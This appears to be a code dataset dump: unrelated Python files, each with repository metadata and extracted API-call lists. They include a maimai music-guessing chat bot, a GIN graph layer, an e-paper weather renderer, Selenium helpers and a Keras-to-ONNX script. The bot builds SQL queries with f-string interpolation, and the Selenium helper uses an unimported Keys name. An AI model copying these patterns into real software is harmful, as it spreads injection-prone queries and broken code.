MessageSegment.text("答案将在 30 秒后揭晓")
])))
asyncio.create_task(give_answer(bot, event, state))
return
state["cycle"] += 1
asyncio.create_task(guess_music_loop(bot, event, state))
async def give_answer(bot: Bot, event: Event, state: T_State):
await asyncio.sleep(30)
guess: GuessObject = state["guess_object"]
if guess.is_end:
return
asyncio.create_task(bot.send(event, Message([MessageSegment.text("答案是:" + f"{guess.music['id']}. {guess.music['title']}\n"), MessageSegment.image(f"https://www.diving-fish.com/covers/{guess.music['id']}.jpg")])))
del guess_dict[state["k"]]
@guess_music.handle()
async def _(bot: Bot, event: Event, state: T_State):
mt = event.message_type
k = (mt, event.user_id if mt == "private" else event.group_id)
if mt == "group":
gid = event.group_id
db = get_driver().config.db
c = await db.cursor()
await c.execute(f"select * from guess_table where group_id={gid}")
data = await c.fetchone()
if data is None:
await c.execute(f'insert into guess_table values ({gid}, 1)')
elif data[1] == 0:
await guess_music.send("本群已禁用猜歌")
return
if k in guess_dict:
if k in guess_cd_dict and time.time() > guess_cd_dict[k] - 400:
# 如果已经过了 200 秒则自动结束上一次
del guess_dict[k]
else:
await guess_music.send("当前已有正在进行的猜歌")
return
whitelists = get_driver().config.whitelists
if not (mt == "group" and gid in whitelists):
if len(guess_dict) >= 5:
await guess_music.finish("千雪有点忙不过来了。现在正在猜的群有点多,晚点再试试如何?")
return
if k in guess_cd_dict and time.time() < guess_cd_dict[k]:
await guess_music.finish(f"已经猜过啦,下次猜歌会在 {time.strftime('%H:%M', time.localtime(guess_cd_dict[k]))} 可用噢")
return
guess = GuessObject()
guess_dict[k] = guess
state["k"] = k
state["guess_object"] = guess
state["cycle"] = 0
guess_cd_dict[k] = time.time() + 600
await guess_music.send("我将从热门乐曲中选择一首歌,并描述它的一些特征,请输入歌曲的【id】、【歌曲标题】或【歌曲标题中 5 个以上连续的字符】进行猜歌(DX乐谱和标准乐谱视为两首歌)。猜歌时查歌等其他命令依然可用。\n警告:这个命令可能会很刷屏,管理员可以使用【猜歌设置】指令进行设置。")
asyncio.create_task(guess_music_loop(bot, event, state))
guess_music_solve = on_message(priority=20)
@guess_music_solve.handle()
async def _(bot: Bot, event: Event, state: T_State):
mt = event.message_type
k = (mt, event.user_id if mt == "private" else event.group_id)
if k not in guess_dict:
return
ans = str(event.get_message())
guess = guess_dict[k]
# await guess_music_solve.send(ans + "|" + guess.music['id'])
if ans == guess.music['id'] or (ans.lower() == guess.music['title'].lower()) or (len(ans) >= 5 and ans.lower() in guess.music['title'].lower()):
guess.is_end = True
del guess_dict[k]
await guess_music_solve.finish(Message([
MessageSegment.reply(event.message_id),
MessageSegment.text("猜对了,答案是:" + f"{guess.music['id']}. {guess.music['title']}\n"),
MessageSegment.image(f"https://www.diving-fish.com/covers/{guess.music['id']}.jpg")
]))
| [((25, 9, 25, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((81, 14, 81, 67), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((103, 12, 103, 76), 'nonebot.on_regex', 'on_regex', ({(103, 21, 103, 75): '"""^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\\\\+?"""'}, {}), "('^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\\\\+?')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((129, 5, 129, 34), 'nonebot.on_regex', 'on_regex', ({(129, 14, 129, 33): '""".*maimai.*什么"""'}, {}), "('.*maimai.*什么')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((137, 15, 137, 37), 'nonebot.on_regex', 'on_regex', ({(137, 24, 137, 36): '"""^查歌.+"""'}, {}), "('^查歌.+')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((154, 14, 154, 58), 'nonebot.on_regex', 'on_regex', ({(154, 23, 154, 57): '"""^([绿黄红紫白]?)id([0-9]+)"""'}, {}), "('^([绿黄红紫白]?)id([0-9]+)')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((243, 7, 243, 56), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((269, 16, 269, 33), 'collections.defaultdict', 'defaultdict', ({(269, 28, 269, 32): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((280, 12, 280, 39), 'nonebot.on_regex', 'on_regex', ({(280, 21, 280, 38): '""".+是什么歌"""'}, {}), "('.+是什么歌')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((299, 14, 299, 37), 'nonebot.on_command', 'on_command', ({(299, 25, 299, 36): '"""分数线"""'}, {}), "('分数线')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((353, 14, 353, 31), 'nonebot.on_command', 'on_command', ({(353, 25, 353, 30): '"""b40"""'}, {}), "('b40')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((377, 22, 377, 60), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((407, 14, 407, 46), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((479, 20, 479, 43), 'nonebot.on_message', 'on_message', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((30, 4, 30, 46), 'nonebot.log.logger.info', 'logger.info', ({(30, 16, 30, 45): '"""Load help text successfully"""'}, {}), "('Load help text successfully')", False, 'from nonebot.log import logger\n'), ((249, 9, 249, 17), 'src.libraries.tool.hash', 'hash', ({(249, 14, 249, 16): 'qq'}, {}), '(qq)', False, 'from src.libraries.tool import hash\n'), ((469, 12, 469, 25), 'src.libraries.maimaidx_guess.GuessObject', 'GuessObject', ({}, {}), '()', False, 'from src.libraries.maimaidx_guess import GuessObject\n'), ((364, 25, 364, 42), 'src.libraries.maimai_best_40.generate', 'generate', ({(364, 34, 364, 41): 'payload'}, {}), '(payload)', False, 'from src.libraries.maimai_best_40 import generate\n'), ((474, 23, 474, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((31, 22, 31, 34), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((147, 30, 151, 33), 'nonebot.adapters.cqhttp.Message', 'Message', ({(147, 38, 151, 32): '[{\'type\': \'text\', \'data\': {\'text\': f"{music[\'id\']}. {music[\'title\']}\\n"}} for\n music in res]'}, {}), '([{\'type\': \'text\', \'data\': {\'text\':\n f"{music[\'id\']}. {music[\'title\']}\\n"}} for music in res])', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((389, 9, 389, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((393, 9, 393, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((461, 17, 461, 29), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((445, 13, 445, 25), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((466, 34, 466, 45), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((189, 35, 208, 14), 'nonebot.adapters.cqhttp.Message', 'Message', ({(189, 43, 208, 13): '[{\'type\': \'text\', \'data\': {\'text\': f"{music[\'id\']}. {music[\'title\']}\\n"}},\n {\'type\': \'image\', \'data\': {\'file\': f\'{file}\'}}, {\'type\': \'text\', \'data\':\n {\'text\': msg}}]'}, {}), '([{\'type\': \'text\', \'data\': {\'text\':\n f"{music[\'id\']}. {music[\'title\']}\\n"}}, {\'type\': \'image\', \'data\': {\n \'file\': f\'{file}\'}}, {\'type\': \'text\', \'data\': {\'text\': msg}}])', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((435, 49, 435, 135), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(435, 69, 435, 134): '(\'答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")'}, {}), '(\'答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((435, 137, 435, 220), 'nonebot.adapters.cqhttp.MessageSegment.image', 'MessageSegment.image', ({(435, 158, 435, 219): 'f"""https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg"""'}, {}), '(\n f"https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((455, 38, 455, 49), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((327, 18, 327, 38), 're.match', 're.match', ({(327, 27, 327, 28): 'r', (327, 30, 327, 37): 'argv[0]'}, {}), '(r, argv[0])', False, 'import re\n'), ((420, 12, 420, 72), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(420, 32, 420, 71): '"""7/7 这首歌封面的一部分是:"""'}, {}), "('7/7 这首歌封面的一部分是:')", False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((422, 12, 422, 63), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(422, 32, 422, 62): '"""答案将在 30 秒后揭晓"""'}, {}), "('答案将在 30 秒后揭晓')", False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((495, 12, 495, 50), 'nonebot.adapters.cqhttp.MessageSegment.reply', 'MessageSegment.reply', ({(495, 33, 495, 49): 'event.message_id'}, {}), '(event.message_id)', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((496, 12, 496, 110), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(496, 32, 496, 109): '(\'猜对了,答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")'}, {}), '(\'猜对了,答案是:\' +\n f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((497, 12, 497, 95), 'nonebot.adapters.cqhttp.MessageSegment.image', 'MessageSegment.image', ({(497, 33, 497, 94): 'f"""https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg"""'}, {}), '(\n f"https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((371, 12, 371, 50), 'nonebot.adapters.cqhttp.MessageSegment.reply', 'MessageSegment.reply', ({(371, 33, 371, 49): 'event.message_id'}, {}), '(event.message_id)', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((467, 100, 467, 132), 'time.localtime', 'time.localtime', ({(467, 115, 467, 131): 'guess_cd_dict[k]'}, {}), '(guess_cd_dict[k])', False, 'import time\n')] |
hsgwa/trace_analysis | trace_analysis/trace_analysis/architecture/interface.py | 16169f84e838af5202e2be8f4883dfca5bc7f592 | # Copyright 2021 Research Institute of Systems Planning, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional
from abc import ABCMeta, abstractmethod
from trace_analysis.callback import CallbackBase
from trace_analysis.communication import VariablePassing, Communication
from trace_analysis.node import Node
UNDEFINED_STR = "UNDEFINED"
class PathAlias:
def __init__(self, alias: str, callback_names: List[str]):
self.path_name = alias
self.callback_names = callback_names
class ArchitectureInterface(metaclass=ABCMeta):
@property
@abstractmethod
def nodes(self) -> List[Node]:
pass
@property
@abstractmethod
def path_aliases(self) -> List[PathAlias]:
pass
@property
@abstractmethod
def communications(self) -> List[Communication]:
pass
@property
@abstractmethod
def variable_passings(self) -> List[VariablePassing]:
pass
class ArchitectureImporter(ArchitectureInterface):
@abstractmethod
def __init__(self) -> None:
pass
@abstractmethod
def exec(self, path: str, ignore_topics: Optional[List[str]] = None) -> None:
pass
class ArchitectureExporter(metaclass=ABCMeta):
@abstractmethod
def exec(self, architecture: ArchitectureInterface, path) -> None:
pass
| [] |
treehousekingcomic/disrank | disrank/__init__.py | 6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7 | from thkc_disrank import *
| [] |
JakeStevens/benchmarking-gnns | layers/gin_layer.py | a17fdf1b1d758fc65d5eeaf3726f5efa747a4081 | import torch
import torch.nn as nn
import torch.nn.functional as F
import dgl.function as fn
"""
GIN: Graph Isomorphism Networks
HOW POWERFUL ARE GRAPH NEURAL NETWORKS? (Keyulu Xu, Weihua Hu, Jure Leskovec and Stefanie Jegelka, ICLR 2019)
https://arxiv.org/pdf/1810.00826.pdf
"""
class GINLayer(nn.Module):
"""
[!] code adapted from dgl implementation of GINConv
Parameters
----------
apply_func : callable activation function/layer or None
If not None, apply this function to the updated node feature,
the :math:`f_\Theta` in the formula.
aggr_type :
Aggregator type to use (``sum``, ``max`` or ``mean``).
out_dim :
Rquired for batch norm layer; should match out_dim of apply_func if not None.
dropout :
Required for dropout of output features.
graph_norm :
boolean flag for output features normalization w.r.t. graph sizes.
batch_norm :
boolean flag for batch_norm layer.
residual :
boolean flag for using residual connection.
init_eps : optional
Initial :math:`\epsilon` value, default: ``0``.
learn_eps : bool, optional
If True, :math:`\epsilon` will be a learnable parameter.
"""
def __init__(self, apply_func, aggr_type, dropout, graph_norm, batch_norm, residual=False, init_eps=0, learn_eps=False):
super().__init__()
self.apply_func = apply_func
if aggr_type == 'sum':
self._reducer = fn.sum
elif aggr_type == 'max':
self._reducer = fn.max
elif aggr_type == 'mean':
self._reducer = fn.mean
else:
raise KeyError('Aggregator type {} not recognized.'.format(aggr_type))
self.graph_norm = graph_norm
self.batch_norm = batch_norm
self.residual = residual
self.dropout = dropout
in_dim = apply_func.mlp.input_dim
out_dim = apply_func.mlp.output_dim
if in_dim != out_dim:
self.residual = False
# to specify whether eps is trainable or not.
if learn_eps:
self.eps = torch.nn.Parameter(torch.FloatTensor([init_eps]))
else:
self.register_buffer('eps', torch.FloatTensor([init_eps]))
self.bn_node_h = nn.BatchNorm1d(out_dim)
def forward(self, g, h, snorm_n):
h_in = h # for residual connection
g = g.local_var()
g.ndata['h'] = h
g.update_all(fn.copy_u('h', 'm'), self._reducer('m', 'neigh'))
h = (1 + self.eps) * h + g.ndata['neigh']
if self.apply_func is not None:
h = self.apply_func(h)
if self.graph_norm:
h = h* snorm_n # normalize activation w.r.t. graph size
if self.batch_norm:
h = self.bn_node_h(h) # batch normalization
h = F.relu(h) # non-linear activation
if self.residual:
h = h_in + h # residual connection
h = F.dropout(h, self.dropout, training=self.training)
return h
class ApplyNodeFunc(nn.Module):
"""
This class is used in class GINNet
Update the node feature hv with MLP
"""
def __init__(self, mlp):
super().__init__()
self.mlp = mlp
def forward(self, h):
h = self.mlp(h)
return h
class MLP(nn.Module):
"""MLP with linear output"""
def __init__(self, num_layers, input_dim, hidden_dim, output_dim):
super().__init__()
self.linear_or_not = True # default is linear model
self.num_layers = num_layers
self.output_dim = output_dim
self.input_dim = input_dim
if num_layers < 1:
raise ValueError("number of layers should be positive!")
elif num_layers == 1:
# Linear model
self.linear = nn.Linear(input_dim, output_dim)
else:
# Multi-layer model
self.linear_or_not = False
self.linears = torch.nn.ModuleList()
self.batch_norms = torch.nn.ModuleList()
self.linears.append(nn.Linear(input_dim, hidden_dim))
for layer in range(num_layers - 2):
self.linears.append(nn.Linear(hidden_dim, hidden_dim))
self.linears.append(nn.Linear(hidden_dim, output_dim))
for layer in range(num_layers - 1):
self.batch_norms.append(nn.BatchNorm1d((hidden_dim)))
def forward(self, x):
if self.linear_or_not:
# If linear model
return self.linear(x)
else:
# If MLP
h = x
for i in range(self.num_layers - 1):
h = F.relu(self.batch_norms[i](self.linears[i](h)))
return self.linears[-1](h) | [((69, 25, 69, 48), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ({(69, 40, 69, 47): 'out_dim'}, {}), '(out_dim)', True, 'import torch.nn as nn\n'), ((87, 12, 87, 21), 'torch.nn.functional.relu', 'F.relu', ({(87, 19, 87, 20): 'h'}, {}), '(h)', True, 'import torch.nn.functional as F\n'), ((92, 12, 92, 62), 'torch.nn.functional.dropout', 'F.dropout', (), '', True, 'import torch.nn.functional as F\n'), ((76, 21, 76, 40), 'dgl.function.copy_u', 'fn.copy_u', ({(76, 31, 76, 34): '"""h"""', (76, 36, 76, 39): '"""m"""'}, {}), "('h', 'm')", True, 'import dgl.function as fn\n'), ((65, 42, 65, 71), 'torch.FloatTensor', 'torch.FloatTensor', ({(65, 60, 65, 70): '[init_eps]'}, {}), '([init_eps])', False, 'import torch\n'), ((67, 40, 67, 69), 'torch.FloatTensor', 'torch.FloatTensor', ({(67, 58, 67, 68): '[init_eps]'}, {}), '([init_eps])', False, 'import torch\n'), ((125, 26, 125, 58), 'torch.nn.Linear', 'nn.Linear', ({(125, 36, 125, 45): 'input_dim', (125, 47, 125, 57): 'output_dim'}, {}), '(input_dim, output_dim)', True, 'import torch.nn as nn\n'), ((129, 27, 129, 48), 'torch.nn.ModuleList', 'torch.nn.ModuleList', ({}, {}), '()', False, 'import torch\n'), ((130, 31, 130, 52), 'torch.nn.ModuleList', 'torch.nn.ModuleList', ({}, {}), '()', False, 'import torch\n'), ((132, 32, 132, 64), 'torch.nn.Linear', 'nn.Linear', ({(132, 42, 132, 51): 'input_dim', (132, 53, 132, 63): 'hidden_dim'}, {}), '(input_dim, hidden_dim)', True, 'import torch.nn as nn\n'), ((135, 32, 135, 65), 'torch.nn.Linear', 'nn.Linear', ({(135, 42, 135, 52): 'hidden_dim', (135, 54, 135, 64): 'output_dim'}, {}), '(hidden_dim, output_dim)', True, 'import torch.nn as nn\n'), ((134, 36, 134, 69), 'torch.nn.Linear', 'nn.Linear', ({(134, 46, 134, 56): 'hidden_dim', (134, 58, 134, 68): 'hidden_dim'}, {}), '(hidden_dim, hidden_dim)', True, 'import torch.nn as nn\n'), ((138, 40, 138, 68), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ({(138, 56, 138, 66): 'hidden_dim'}, {}), '(hidden_dim)', True, 'import torch.nn as nn\n')] |
jedhsu/music | music/distance/aural/diatonic/__init__.py | dea68c4a82296cd4910e786f533b2cbf861377c3 | """
*mus . it . dia*
The simple diatonic intervals.
"""
from .second import MinorSecond
from .second import MajorSecond
from .third import MinorThird
from .third import MajorThird
from .fourth import PerfectFourth
from .fifth import Tritone
from .fifth import PerfectFifth
from .sixth import MinorSixth
from .sixth import MajorSixth
from .seventh import MinorSeventh
from .seventh import MajorSeventh
from .eighth import Octave
__all__ = [
"MinorSecond",
"MajorSecond",
"MinorThird",
"MajorThird",
"PerfectFourth",
"Tritone",
"PerfectFifth",
"MinorSixth",
"MajorSixth",
"MinorSeventh",
"MajorSeventh",
"Octave",
]
| [] |
AriTheGuitarMan/AriTheGuitarMan.github.io | selenium_tests/test_functions.py | 8348ad0c47e48477560e7e40ec7eac8bca6fcdfa | # this file holds some common testing functions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
depurl = "localhost:3000"
def getElement(driver, xpath):
return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath)))
def login(driver, username, password):
driver.get(depurl)
elem = getElement(driver, "//input[@id='username']")
elem.clear()
elem.send_keys(username)
elem = getElement(driver, "//input[@id='password']")
elem.clear()
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
def logout(driver):
elem = getElement(driver, "//a[text()='Logout']")
elem.click() | [((9, 43, 9, 92), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', ({(9, 74, 9, 91): '(By.XPATH, xpath)'}, {}), '((By.XPATH, xpath))', True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((9, 11, 9, 36), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', ({(9, 25, 9, 31): 'driver', (9, 33, 9, 35): '(10)'}, {}), '(driver, 10)', False, 'from selenium.webdriver.support.wait import WebDriverWait\n')] |
ryuchihoon/WeatherStation | papirus_renderer.py | e3fd210939a961bc1724197f3885964cb4ae5a28 | #-- coding: utf-8 --
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import time
import collections
from PIL import Image, ImageOps, ImageDraw, ImageFont
code_2_icono = collections.defaultdict(lambda : '38')
kor_2_eng = collections.defaultdict(lambda : 'UNKNOWN')
code_2_icono['SKY_O00'] = ['38']
code_2_icono['SKY_O01'] = ['01', '08']
code_2_icono['SKY_O02'] = ['02', '09']
code_2_icono['SKY_O03'] = ['03', '10']
code_2_icono['SKY_O04'] = ['12', '40']
code_2_icono['SKY_O05'] = ['13', '41']
code_2_icono['SKY_O06'] = ['14', '42']
code_2_icono['SKY_O07'] = ['18']
code_2_icono['SKY_O08'] = ['21']
code_2_icono['SKY_O09'] = ['32']
code_2_icono['SKY_O10'] = ['04']
code_2_icono['SKY_O11'] = ['29']
code_2_icono['SKY_O12'] = ['26']
code_2_icono['SKY_O13'] = ['27']
code_2_icono['SKY_O14'] = ['28']
code_2_icono['SKY_W00'] = ['38']
code_2_icono['SKY_W01'] = ['01', '08']
code_2_icono['SKY_W02'] = ['02', '09']
code_2_icono['SKY_W03'] = ['03', '10']
code_2_icono['SKY_W04'] = ['18']
code_2_icono['SKY_W07'] = ['21']
code_2_icono['SKY_W09'] = ['12', '40']
code_2_icono['SKY_W10'] = ['21']
code_2_icono['SKY_W11'] = ['04']
code_2_icono['SKY_W12'] = ['13', '41']
code_2_icono['SKY_W13'] = ['32']
kor_2_eng[u'좋음'] = ['GOOD']
kor_2_eng[u'보통'] = ['NORMAL']
kor_2_eng[u'나쁨'] = ['BAD']
kor_2_eng[u'매우 나쁨'] = ['V BAD']
def geticonfname(code, drawNight=False):
l = code_2_icono[code]
dname = os.path.join(os.path.dirname(__file__), "resources", "weather_icons_mod")
if len(l) > 1 and drawNight:
cur_hour = time.localtime().tm_hour
is_night = cur_hour < 5 or cur_hour > 18
if is_night:
return os.path.join(dname, l[1] + '.png')
else:
return os.path.join(dname, l[0] + '.png')
else:
return os.path.join(dname, l[0] + '.png')
BLACK = 0
WHITE = 1
class PapirusRenderer:
"""Renderer for Papirus HAT"""
def __init__(self, rotate=0, font_path=None):
if font_path:
self.font_path = font_path
else:
self.font_path = "/usr/share/fonts/truetype/freefont/FreeMono.ttf"
print("rotate:",rotate)
try:
from papirus import Papirus
self.papirus = Papirus(rotate=rotate)
self.canvas_size = self.papirus.size
print("papirus size : %s"%str(self.canvas_size))
except ImportError:
print("papirus import failed")
self.papirus = None
self.canvas_size = (264,176)
def render(self, weather, weather_forecast):
canvas = Image.new('1', self.canvas_size, WHITE)
print("font_path:",self.font_path)
fname = geticonfname(weather.weather_code, drawNight=True)
print("file:",fname)
self._drawImage(canvas, fname, 20,10,(100,100))
print("cur desc : %s"%str(weather.weather_desc))
print("cur airq : %s"%str(weather.air_quality))
temperature = str(weather.cur_temperature).split('.')[0] + u" \u2103"
self._drawText(canvas, temperature, 70,115, font_size=20, center_horizontal=True)
translated = kor_2_eng[weather.air_quality][0]
print("cur airq translated: %s"%translated)
self._drawText(canvas, translated, 70,140, font_size=20, center_horizontal=True)
base_x,base_y = 145,5
for i,w in enumerate(weather_forecast):
fname = geticonfname(w.weather_code)
self._drawImage(canvas, fname, base_x, base_y+55*i, (50,50))
temperature = str(w.min_temperature) + " / " + str(w.max_temperature)
self._drawText(canvas, temperature, base_x+80, base_y+28+55*i, font_size=14, center_horizontal=True)
# update time
self._drawText(canvas, time.strftime("%Y-%m-%d %H:%M",time.localtime()), 136, 165, font_size=9, center_horizontal=True)
if self.papirus == None:
# save a image for debugging purpose
with open("result.jpg", "wb") as fp:
canvas.save(fp)
print("result file saved")
else:
self.papirus.display(canvas)
self.papirus.update()
def _drawImage(self, canvas, image_path, x, y, size):
image = Image.open(image_path)
image = ImageOps.grayscale(image)
image = image.resize(size)
image = image.convert("1", dither=Image.FLOYDSTEINBERG)
canvas.paste(image,(x,y))
def _drawText(self, canvas, text, x, y, font_size=20, center_horizontal=False):
draw = ImageDraw.Draw(canvas)
font = ImageFont.truetype(self.font_path, font_size)
text_draw_size = draw.textsize(text, font=font)
if center_horizontal:
x = x - text_draw_size[0]/2
draw.text( (x, y) , text, font=font, fill=BLACK)
| [((5, 0, 5, 31), 'sys.setdefaultencoding', 'sys.setdefaultencoding', ({(5, 23, 5, 30): '"""utf-8"""'}, {}), "('utf-8')", False, 'import sys\n'), ((14, 15, 14, 53), 'collections.defaultdict', 'collections.defaultdict', ({(14, 39, 14, 52): "lambda : '38'"}, {}), "(lambda : '38')", False, 'import collections\n'), ((15, 12, 15, 55), 'collections.defaultdict', 'collections.defaultdict', ({(15, 36, 15, 54): "lambda : 'UNKNOWN'"}, {}), "(lambda : 'UNKNOWN')", False, 'import collections\n'), ((54, 25, 54, 50), 'os.path.dirname', 'os.path.dirname', ({(54, 41, 54, 49): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((63, 15, 63, 49), 'os.path.join', 'os.path.join', ({(63, 28, 63, 33): 'dname', (63, 35, 63, 48): "(l[0] + '.png')"}, {}), "(dname, l[0] + '.png')", False, 'import os\n'), ((95, 17, 95, 56), 'PIL.Image.new', 'Image.new', ({(95, 27, 95, 30): '"""1"""', (95, 32, 95, 48): 'self.canvas_size', (95, 50, 95, 55): 'WHITE'}, {}), "('1', self.canvas_size, WHITE)", False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((131, 16, 131, 38), 'PIL.Image.open', 'Image.open', ({(131, 27, 131, 37): 'image_path'}, {}), '(image_path)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((132, 16, 132, 41), 'PIL.ImageOps.grayscale', 'ImageOps.grayscale', ({(132, 35, 132, 40): 'image'}, {}), '(image)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((139, 15, 139, 37), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(139, 30, 139, 36): 'canvas'}, {}), '(canvas)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((140, 15, 140, 60), 'PIL.ImageFont.truetype', 'ImageFont.truetype', ({(140, 34, 140, 48): 'self.font_path', (140, 50, 140, 59): 'font_size'}, {}), '(self.font_path, font_size)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((56, 19, 56, 35), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n'), ((59, 19, 59, 53), 'os.path.join', 'os.path.join', ({(59, 32, 59, 37): 'dname', (59, 39, 59, 52): "(l[1] + '.png')"}, {}), "(dname, l[1] + '.png')", False, 'import os\n'), ((61, 19, 61, 53), 'os.path.join', 'os.path.join', ({(61, 32, 61, 37): 'dname', (61, 39, 61, 52): "(l[0] + '.png')"}, {}), "(dname, l[0] + '.png')", False, 'import os\n'), ((84, 27, 84, 49), 'papirus.Papirus', 'Papirus', (), '', False, 'from papirus import Papirus\n'), ((118, 62, 118, 78), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n')] |
VForWaTer/hydrobox | hydrobox/discharge/__init__.py | ae7d10bf5aa48bf7daf3d1094e6bb66f0a7ce96b | from .catchment import regime, flow_duration_curve
from . import indices | [] |
ecmwf-lab/infero | scripts/convert_keras2onnx.py | 4fec006175af48cd0313b2f89722c01636e961db | #
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import os
import numpy as np
import argparse
import keras
import keras2onnx
if __name__ == "__main__":
"""
Lightweight script to convert a keras model into a TFlite model
"""
parser = argparse.ArgumentParser("Data Augmentation")
parser.add_argument('keras_model_path', help="Path of the input keras model")
parser.add_argument('onnx_model_path', help="Path of the output onnx model")
parser.add_argument("--verify_with", help="Check the model by passing an input numpy path")
args = parser.parse_args()
# load the keras model
model = keras.models.load_model(args.keras_model_path)
model.summary()
# do the conversion
onnx_model = keras2onnx.convert_keras(model, model.name)
# write to file
file = open(args.onnx_model_path, "wb")
file.write(onnx_model.SerializeToString())
file.close()
